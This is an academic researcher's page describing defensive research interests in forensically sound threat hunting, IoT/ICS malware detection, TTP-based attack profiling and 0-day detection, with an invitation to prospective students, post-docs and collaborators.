Research on practical/technical aspects of digital forensics, threat hunting and threat intelligence is always inspiring me. Please note, although I do use all sorts of different computer science techniques (e.g., machine learning, data analytics, etc.) in my works, I am only interested in solving hunting/investigation problems, and not interested in advancing the field in other areas. Also, note that I am not interested in Cryptography and intrusion detection in the general sense. Current attacks are more sophisticated and specific and although what I do is related to IDS, but I target more specific problems to have more effective solutions (e.g., APT detection, exploitation detection, etc.) as follow:
Forensically Sound Cyber Threat Hunting and Intelligence
Today's adversaries including Advanced Persistent Threat (APT) actors accomplish their goals using advanced tools and techniques designed to circumvent most conventional computer network defence mechanisms, go undetected during the intrusion, and then remain undetected on networks over long periods of time. Hence it is necessary to build tools, techniques and strategies to hunt for attackers’ remnants on different host and network locations and utilise different fuzzy learning and deep learning techniques to analyse collected data to build intelligence that can be used for determining threat actors’ tactics, techniques and procedures (TTPs). It is equally important to guarantee forensics soundness during collection and preservation of threat actors remnants (forensically sound threat hunting) and preserve user's privacy in collection of only relevant data to the given investigation case. Following are couple of more focused research areas in this domain:
Cyber Threat Hunting and Intelligence in Internet of Things (IoT) and Industrial Control Systems (ICS)
With the fast integration of computation and networking in all physical process and development of lots of smart-contexts, the spectrum of devices that can be investigated is extensive. A range of devices and protocols from PDAs and mobile devices to automobiles, sensors, and robots which are interconnected pervasively! The examination of these devices is a crucial component in future legal, governmental, and business investigations. Therefore, we need models and frameworks that for forensically sound collection, preservation, analysis and documentation of evidence in these environments.
Real-Time Malware Detection in IoT/ICS Networks
IoT platforms are the best means of spreading and dispatching malicious programs as these systems are usually lacking of standard detection/protection systems (i.e. Firewalls, IDS,..) and end-nodes are usually not employing any defensive mechanism. Therefore, developing light weight and generalizable techniques for real-time detection of malicious programs is important for securing IoT networks .
Attack Profiling using Attackers TTPs
While many of existing attack attribution techniques are relying on easy to change Indications of Compromise (IOCs), a reliable attack profiling should be based on attackers Tactics, Techniques and Procedures (TTPs) which are hard to change (refer to the hackers Pyramid of Pain). Utilising pattern recognition, fuzzy and deep learning techniques to detect proprties of attackers TTPs and automate the detection process to be suitable for large scale deployment is an interesting research challenge.
Detecting Software Vulnerabilities and 0-Day Exploits
With the fast growth of IT industry and huge pressure on quickly developing software programs; tones of vulnerabilities are released every day! Timely detection and properly handling these vulnerabilities require a lot of consistent research. Developing (semi) automated tools and techniques for detection of 0-day vulnerabilities and mechanisms to mitigate risks of 0-day exploits are important goals of this project.
Future Students & Research Collaboration
I am always looking for active degree, master and Ph.D students and post-doc candidates interested to work in practical aspects of cyber-security and digital forensics! If you are having interests in cyber-security and digital forensics, I would love to hear from you! We can further discuss and define specific projects suitable for your level as follow:
- Short-Term Research Projects (2-4 month suitable for master-by-course or final year degree students): I occasionally have good short-term (2-4 month) projects in digital forensics. These projects are suitable for final year degree students or master-by-course (MSc) candidates looking for advancing their skills in digital investigation and would like to have some publications. I am usually expecting at least one good paper out of short-term projects.
- Visiting Fellows & Sabbatical projects (3 month-1 year): If you are an experienced researcher in cyber-forensics or security and looking for an international research center to spend your sabbatical leave or fellowship period you may consider joining us! Please feel free to contact me to further discuss opportunities and requirements.
- Ph.D and Master-by-Research (MPhil) Research Projects (1-3 year): I am almost always having good practical mid-term and long-term research projects for hardworking candidates! I believe master and Ph.D projects should be first well-defined and then passed to the talented students to complete them! IF you are looking to extend your research skills and expertise in digital forensics or cyber-security you may consider contacting me with a short-C.V and brief statement of interest.
- Post-doctoral projects (1-2 year): EU and U.K research funds are offering good opportunities to conduct post-doctoral research. As a post-doc applicant you should have a strong research proposal/plan, a good resume with several refereed journal papers, and patience to go through usually long funding application process. If you are looking for a post-doc position in digital forensics or malware analysis you may contact me with your resume and we can work on developing a strong research proposal for EU and UK funding calls!
- Remote Research Collaboration: The pervasive network connections made it much easier to remotely collaborate on different research topics. I am always keen to establish remote research collaboration with serious researchers! Surveying security awareness and contextual cyber-security research (in the context of your country/location) on previously established topics are usually good starting points for remote collaboration. If you are interested in remote research please feel free to contact me with a brief statement of your background and what you are looking for to initiate our collaboration.
Please feel free to contact me for further information or to make an appointment.